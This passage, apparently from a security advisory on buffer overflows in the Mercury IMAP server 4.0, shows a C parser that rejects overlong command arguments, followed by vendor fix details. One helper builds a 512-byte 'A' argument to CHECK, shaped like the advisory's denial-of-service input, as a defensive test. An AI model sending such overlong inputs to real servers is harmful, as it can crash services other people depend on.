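{
    if (len >= dst_size)
        return 0;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 1;
}

static int is_known_command(const char *name)
{
    size_t i;
    for (i = 0; i < sizeof known_commands / sizeof known_commands[0]; i++)
        if (strcmp(name, known_commands[i]) == 0)
            return 1;
    return 0;
}

/* Parse one line of the form "<tag> <COMMAND>[ <argument>]\r\n". */
enum imap_parse_result imap_parse_line(const char *line, struct imap_command *out)
{
    const char *p = line, *sp;
    size_t n, arg_len;
    char *c;

    memset(out, 0, sizeof *out);

    /* tag: up to the first space */
    sp = strchr(p, ' ');
    if (sp == NULL || sp == p)
        return IMAP_ERR_SYNTAX;
    if (!copy_bounded(out->tag, sizeof out->tag, p, (size_t)(sp - p)))
        return IMAP_ERR_SYNTAX;
    p = sp + 1;

    /* command name: up to the next space or the end of the line */
    sp = strchr(p, ' ');
    n = sp ? (size_t)(sp - p) : strcspn(p, "\r\n");
    if (!copy_bounded(out->name, sizeof out->name, p, n))
        return IMAP_ERR_UNKNOWN_COMMAND;   /* too long to be any command we know */
    for (c = out->name; *c; c++)
        *c = (char)toupper((unsigned char)*c);
    if (!is_known_command(out->name))
        return IMAP_ERR_UNKNOWN_COMMAND;
    if (sp == NULL)
        return IMAP_OK;                    /* CHECK, CLOSE, EXPUNGE take no argument */
    p = sp + 1;

    /* argument: everything up to CRLF; refused, not truncated, when too long */
    arg_len = strcspn(p, "\r\n");
    if (!copy_bounded(out->arg, sizeof out->arg, p, arg_len))
        return IMAP_ERR_ARG_TOO_LONG;
    return IMAP_OK;
}

/* Build "0001 <cmd> AAA...A\r\n" with arg_len 'A's (constructed input, shaped like
 * the 512-byte CHECK argument in the DoS script above) and parse it. */
enum imap_parse_result parse_constructed_line(const char *cmd, size_t arg_len)
{
    static char line[MAX_LINE_LEN];
    struct imap_command parsed;
    size_t prefix = (size_t)snprintf(line, sizeof line, "0001 %s ", cmd);

    if (arg_len > sizeof line - prefix - 3)
        arg_len = sizeof line - prefix - 3;
    memset(line + prefix, 'A', arg_len);
    memcpy(line + prefix + arg_len, "\r\n", 3);   /* copies the NUL as well */
    return imap_parse_line(line, &parsed);
}

int main(void)
{
    struct imap_command cmd;
    enum imap_parse_result r = imap_parse_line("a001 SELECT INBOX\r\n", &cmd);
    printf("a001 SELECT INBOX -> %d (tag=%s name=%s arg=%s)\n", r, cmd.tag, cmd.name, cmd.arg);
    printf("0001 CHECK A*512  -> %d (3 = argument refused)\n", parse_constructed_line("CHECK", 512));
    return 0;
}
```

The point of the example is where the length check sits: the argument is rejected before any byte is written, so a 260-byte or 512-byte argument to any of the listed commands yields `IMAP_ERR_ARG_TOO_LONG` and a protocol error to the client instead of a corrupted stack frame. A server that logs that return code also gets a cheap detection signal for the overlong-argument pattern this advisory describes.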

- Exploits

The following exploits are available:

- Solution

The vendor has released version 4.01b to address these issues.


David Harris Mercury (win32 version) 4.0 1

David Harris Mercury (win32 version) 4.0 1a

